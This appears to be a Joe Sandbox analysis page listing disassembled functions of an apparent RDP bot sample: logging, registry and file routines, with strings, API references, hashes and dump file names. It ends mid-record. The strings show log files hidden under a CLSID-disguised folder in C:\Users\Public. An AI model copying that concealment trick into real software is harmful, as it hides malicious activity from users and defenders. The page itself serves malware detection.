Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
API String ID: 3395718042-1794035234
Opcode ID: c0500373ee09827ee142d1d9492b311746de8089aa615731dc60aa0a94030b99
Instruction ID: c656c0e953c543a6370e1b9f50561b62b8de1dd027137567ebb6e88f530c3396
Opcode Fuzzy Hash: c0500373ee09827ee142d1d9492b311746de8089aa615731dc60aa0a94030b99
Instruction Fuzzy Hash: AC517C91E1D70782FA30AF59A8803B92365EF04784F984032D9CE4A2B6DE6CF9C58F41

Function 00007FFE0E16143C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E16145C
GetLastError.KERNEL32 ref: 00007FFE0E161590

Part of subcall function 00007FFE0E16CC60: GetModuleHandleExA.KERNEL32 ref: 00007FFE0E16CC7E

strlen.MSVCRT ref: 00007FFE0E1614AE
strlen.MSVCRT ref: 00007FFE0E1614CA
strcat.MSVCRT ref: 00007FFE0E1614E5
strlen.MSVCRT ref: 00007FFE0E1614ED
strlen.MSVCRT ref: 00007FFE0E161502
fopen.MSVCRT ref: 00007FFE0E161528

Strings

[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0E1615A2
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16157A
Done, xrefs: 00007FFE0E1616CD
~, xrefs: 00007FFE0E161615
log, xrefs: 00007FFE0E161517
debug_init, xrefs: 00007FFE0E16154E, 00007FFE0E161573, 00007FFE0E16159B, 00007FFE0E161660, 00007FFE0E1616D4
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFE0E16148E, 00007FFE0E1614A4, 00007FFE0E1614DB, 00007FFE0E1614F8, 00007FFE0E161547
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0E161667
[I] (%s) -> %s, xrefs: 00007FFE0E1616DB
samctl.l, xrefs: 00007FFE0E16150A
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0E161555
, xrefs: 00007FFE0E1615AE
P, xrefs: 00007FFE0E16161A

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
API String ID: 3395718042-1297835036
Opcode ID: 75ce88114f5ed3673b241250adb80a8e0a3a4f430a2aff4d0550542a4359febc
Instruction ID: 2b1b7227dc494e42412e9eb230d652b9badbfd2ec09cbc4242d57d9e97602156
Opcode Fuzzy Hash: 75ce88114f5ed3673b241250adb80a8e0a3a4f430a2aff4d0550542a4359febc
Instruction Fuzzy Hash: 6A517A90F0D717A5FB209B15B8803BC6365AF46B88F944433D9DE166B3DE6CB946C381

Function 00007FFE11EC317C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11EC319C
GetLastError.KERNEL32 ref: 00007FFE11EC32D0

Part of subcall function 00007FFE11EC1E40: GetModuleHandleExA.KERNEL32 ref: 00007FFE11EC1E5E

strlen.MSVCRT ref: 00007FFE11EC31EE
strlen.MSVCRT ref: 00007FFE11EC320A
strcat.MSVCRT ref: 00007FFE11EC3225
strlen.MSVCRT ref: 00007FFE11EC322D
strlen.MSVCRT ref: 00007FFE11EC3242
fopen.MSVCRT ref: 00007FFE11EC3268

Strings

debug_init, xrefs: 00007FFE11EC328E, 00007FFE11EC32B3, 00007FFE11EC32DB, 00007FFE11EC33A0, 00007FFE11EC3414
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFE11EC31CE, 00007FFE11EC31E4, 00007FFE11EC321B, 00007FFE11EC3238, 00007FFE11EC3287
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE11EC3295
[I] (%s) -> %s, xrefs: 00007FFE11EC341B
, xrefs: 00007FFE11EC32EE
Done, xrefs: 00007FFE11EC340D
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE11EC32E2
log, xrefs: 00007FFE11EC3257
dwlmgr.l, xrefs: 00007FFE11EC324A
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE11EC33A7
~, xrefs: 00007FFE11EC3355
P, xrefs: 00007FFE11EC335A
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC32BA

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
API String ID: 3395718042-2859552336
Opcode ID: d866d4520e6646e688fe6c53166ec7f3a941c848705e6ec98f60068003c99dcc
Instruction ID: 8c6f1a03077aef74dba148bdcb050621d7b3318932e94cdef84df5b1056fdccf
Opcode Fuzzy Hash: d866d4520e6646e688fe6c53166ec7f3a941c848705e6ec98f60068003c99dcc
Instruction Fuzzy Hash: 6E514E10E1CF0782FF245BD7AC843BB1259AF45774F9450B2C90E062B2EE6DBA86D741

Function 00007FFE11508702 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE1150875C
RegQueryValueExA.ADVAPI32 ref: 00007FFE115088A4

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11508A1D
NULL, xrefs: 00007FFE115088FE, 00007FFE11508BAC, 00007FFE11508BB8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115087D7, 00007FFE1150880A, 00007FFE1150883D, 00007FFE11508870
(value_sz != NULL), xrefs: 00007FFE11508862
(value != NULL), xrefs: 00007FFE1150882F
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1150877E
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE115088D2
P, xrefs: 00007FFE11508958
P, xrefs: 00007FFE1150894F
registry_get_value, xrefs: 00007FFE11508777, 00007FFE115087D0, 00007FFE11508803, 00007FFE11508836, 00007FFE11508869, 00007FFE115088CB, 00007FFE11508A16, 00007FFE11508B94
(key != NULL), xrefs: 00007FFE115087FC
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE115087C2, 00007FFE115087F5, 00007FFE11508828, 00007FFE1150885B
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11508B9B
, xrefs: 00007FFE115088DE
, xrefs: 00007FFE115088E7
(root != NULL), xrefs: 00007FFE115087C9

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 10e2f2bcc86c5db24003d7257f55d133fe8bf5ec320687aeaeab675f932333e7
Instruction ID: 213b15b1b6d8173aa771f3a70e0b745a70e7920eb6db43ec3232965a47101512
Opcode Fuzzy Hash: 10e2f2bcc86c5db24003d7257f55d133fe8bf5ec320687aeaeab675f932333e7
Instruction Fuzzy Hash: 6CA14B60D0CF0B91F721AB87A840BBD225DAF00774E5405BAD94E467B5EFADE985D303

Function 00007FFE0EB42472 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0EB424CC
RegQueryValueExA.ADVAPI32 ref: 00007FFE0EB42614

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0EB42642
P, xrefs: 00007FFE0EB426BF
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0EB424EE
(key != NULL), xrefs: 00007FFE0EB4256C
registry_get_value, xrefs: 00007FFE0EB424E7, 00007FFE0EB42540, 00007FFE0EB42573, 00007FFE0EB425A6, 00007FFE0EB425D9, 00007FFE0EB4263B, 00007FFE0EB42786, 00007FFE0EB42904
, xrefs: 00007FFE0EB42657
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0EB4278D
, xrefs: 00007FFE0EB4264E
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0EB4290B
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0EB42532, 00007FFE0EB42565, 00007FFE0EB42598, 00007FFE0EB425CB
(value_sz != NULL), xrefs: 00007FFE0EB425D2
NULL, xrefs: 00007FFE0EB4266E, 00007FFE0EB4291C, 00007FFE0EB42928
P, xrefs: 00007FFE0EB426C8
(value != NULL), xrefs: 00007FFE0EB4259F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB42547, 00007FFE0EB4257A, 00007FFE0EB425AD, 00007FFE0EB425E0
(root != NULL), xrefs: 00007FFE0EB42539

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 1abb7ebd222f50c9fc3d373f1674413f5d06b6c098932a38b08917e042cbaed5
Instruction ID: 2667aeca55bc9b5327690d97f469b3a4314182f243a021d48afd402c142183d7
Opcode Fuzzy Hash: 1abb7ebd222f50c9fc3d373f1674413f5d06b6c098932a38b08917e042cbaed5
Instruction Fuzzy Hash: 1BA14CA5E0C74B81FA709F44A8403B87354EF04744F940132EADE466B9EE6DEE85EF42

Function 00007FFE0E16B0E2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0E16B13C
RegQueryValueExA.ADVAPI32 ref: 00007FFE0E16B284

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0E16B2B2
(value != NULL), xrefs: 00007FFE0E16B20F
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E16B3FD
NULL, xrefs: 00007FFE0E16B2DE, 00007FFE0E16B58C, 00007FFE0E16B598
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16B1B7, 00007FFE0E16B1EA, 00007FFE0E16B21D, 00007FFE0E16B250
, xrefs: 00007FFE0E16B2C7
P, xrefs: 00007FFE0E16B338
, xrefs: 00007FFE0E16B2BE
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0E16B15E
P, xrefs: 00007FFE0E16B32F
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0E16B1A2, 00007FFE0E16B1D5, 00007FFE0E16B208, 00007FFE0E16B23B
(root != NULL), xrefs: 00007FFE0E16B1A9
(value_sz != NULL), xrefs: 00007FFE0E16B242
registry_get_value, xrefs: 00007FFE0E16B157, 00007FFE0E16B1B0, 00007FFE0E16B1E3, 00007FFE0E16B216, 00007FFE0E16B249, 00007FFE0E16B2AB, 00007FFE0E16B3F6, 00007FFE0E16B574
(key != NULL), xrefs: 00007FFE0E16B1DC
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0E16B57B

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 632aff3722bd8956f43628932af91c65379f9aea214a8283ff1c1a5fc9fdd48f
Instruction ID: e0be538e72c5d9ca48400dccdab6c26f61b90234eaf67667fe3a28693ca64aa8
Opcode Fuzzy Hash: 632aff3722bd8956f43628932af91c65379f9aea214a8283ff1c1a5fc9fdd48f
Instruction Fuzzy Hash: 6CA15E60E0C75B82FB349B00A944BB93260AF54788F540137DADE867B7EF6DE985C342

Function 00007FFE11EC9702 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE11EC975C
RegQueryValueExA.ADVAPI32 ref: 00007FFE11EC98A4

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE11EC97C2, 00007FFE11EC97F5, 00007FFE11EC9828, 00007FFE11EC985B
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE11EC98D2
(value_sz != NULL), xrefs: 00007FFE11EC9862
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11EC9B9B
, xrefs: 00007FFE11EC98E7
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11EC9A1D
NULL, xrefs: 00007FFE11EC98FE, 00007FFE11EC9BAC, 00007FFE11EC9BB8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC97D7, 00007FFE11EC980A, 00007FFE11EC983D, 00007FFE11EC9870
(key != NULL), xrefs: 00007FFE11EC97FC
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE11EC977E
registry_get_value, xrefs: 00007FFE11EC9777, 00007FFE11EC97D0, 00007FFE11EC9803, 00007FFE11EC9836, 00007FFE11EC9869, 00007FFE11EC98CB, 00007FFE11EC9A16, 00007FFE11EC9B94
(root != NULL), xrefs: 00007FFE11EC97C9
P, xrefs: 00007FFE11EC9958
(value != NULL), xrefs: 00007FFE11EC982F
P, xrefs: 00007FFE11EC994F
, xrefs: 00007FFE11EC98DE

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-354652506
Opcode ID: 4fa9bc14e8b7fe17cf5636f8bd777390257dfd3d450101781a440f926167c241
Instruction ID: deea11fde9ea289ad861196eb6cd729d560ab9accdb0000eb1c8abfb74a78293
Opcode Fuzzy Hash: 4fa9bc14e8b7fe17cf5636f8bd777390257dfd3d450101781a440f926167c241
Instruction Fuzzy Hash: 89A12D2190CF4B91FB209BC7AC403FB625CAF00768ED811B2D95E066B1FE6DB985C342

Function 00007FF76A90227B Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 133fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FF76A9022A3
fclose.MSVCRT ref: 00007FF76A9022D5
_errno.MSVCRT ref: 00007FF76A90238F
_errno.MSVCRT ref: 00007FF76A9023B0
fwrite.MSVCRT ref: 00007FF76A902424

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A902342, 00007FF76A902372
NULL, xrefs: 00007FF76A9024DA, 00007FF76A9024E6
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF76A9023A4
(path != NULL), xrefs: 00007FF76A902334
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF76A902504
(mode != NULL), xrefs: 00007FF76A902364
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF76A902454
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A90232D, 00007FF76A90235D
fs_file_write, xrefs: 00007FF76A902305, 00007FF76A90233B, 00007FF76A90236B, 00007FF76A90239D, 00007FF76A90244D, 00007FF76A9024FD
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF76A90230C

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: _errno$fclosefopenfwrite
String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 608220805-961576452
Opcode ID: d16384f81800e6e5c258ac0a5399fff4f4b3cea56f213a66df83229811587632
Instruction ID: 790b391e98742f81b00fbd769fc2c84fb9ddb7291a5e50b7b3750fc2a8d425fe
Opcode Fuzzy Hash: d16384f81800e6e5c258ac0a5399fff4f4b3cea56f213a66df83229811587632
Instruction Fuzzy Hash: B6516A61A09742C9FB12BB58E9402B8A311AF547D4FF801BADA5D87294EE3DE956C320

Function 00007FFE115042BE Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE115042DD
CreateDirectoryA.KERNEL32 ref: 00007FFE115042FF
GetLastError.KERNEL32 ref: 00007FFE11504350
strcpy.MSVCRT ref: 00007FFE115043A1
strlen.MSVCRT ref: 00007FFE115043A9
strlen.MSVCRT ref: 00007FFE115043C5
strlen.MSVCRT ref: 00007FFE115043D6
CreateDirectoryA.KERNEL32 ref: 00007FFE11504447
GetLastError.KERNEL32 ref: 00007FFE11504451

Strings

fs_dir_create, xrefs: 00007FFE1150432E, 00007FFE11504362, 00007FFE115043F9, 00007FFE1150451F, 00007FFE11504586
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11504335
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FFE11504526
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FFE1150458D
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FFE11504369
NULL, xrefs: 00007FFE11504577
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FFE11504400
(path != NULL), xrefs: 00007FFE11504327
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11504320

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-906809513
Opcode ID: f99f7b159cb3390f3f5e0599ab982efe612358ae9b05b666bcd1237c7708f9f8
Instruction ID: 98ee8fd73b96f8d9969d6311e7c201764c4a4893c92849739015088b126a9a69
Opcode Fuzzy Hash: f99f7b159cb3390f3f5e0599ab982efe612358ae9b05b666bcd1237c7708f9f8
Instruction Fuzzy Hash: 7A71C151F0CE8382FB218B97F4807BD2A4AAF44778F1611BAD90E476B5DF2CE9858301

Function 00007FF76A909B8C Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF76A909BAC
